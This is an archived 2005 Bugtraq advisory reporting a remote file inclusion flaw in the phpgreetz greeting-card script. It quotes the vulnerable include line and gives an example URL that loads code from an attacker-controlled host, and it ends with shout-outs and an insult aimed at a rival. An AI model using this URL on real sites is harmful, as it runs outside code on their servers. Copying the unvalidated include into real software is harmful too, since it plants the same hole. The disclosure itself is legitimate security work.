lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20051126222613.21216.qmail@securityfocus.com>
Date: 26 Nov 2005 22:26:13 -0000
From: gb.network@...il.com
To: bugtraq@...urityfocus.com
Subject: Remote file include in phpgreetz


Language: PHP
Script: phpgreetz
Version: 0.1a
Official website: http://sourceforge.net/projects/phpgreetz/
Problem: Remote file inclusion
Discovered by: beford & ][GB][
 
Description:
===========
Free greeting card website, being built and distributed as open source. 
Includes all functions and features to run a standalone site, including image uploading, 
user registration and profile management, mailing lists, image search engine, automatic thumb
 
Problem:
========
A remote user can include and execute arbitrary PHP code from the remote location.
The problem is in the file "content.php" at line 3:

include ($content);

 
Explotation example:
===================

http://[target]/path_to_phpgreetz/content.php?content=http://[attacker_url]

 
Solution:
========
 
Not solution at this time.
 
 
Greetz:
=======
 
uyx, beford, Zetha, lithyum,_|MALANDDO|_ ,desKrriado, |LINUX|, Amon-Ra, Extremo, SecretDreams, caffa
 
&& irc.gigachat.net #uruguay, #h4ck3rsbr, #IYS, #D.O.M, #MSR ,,, irc.fullnetwork.org #full, #f4kelive
   
irc.org.ve #uruguay, #venezuela
 
Fuckz:
=====
Morgan lamer and his irc.irc-argentina.org, his small ddos-botnet, its hidden in that server, the bot
s are
supposed to be argentinian users but noooo, he is using that ripped worm code i mentioned before!!!
he is such a leet h4x0r from santiago del estero (.ar)! hahahhaa


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ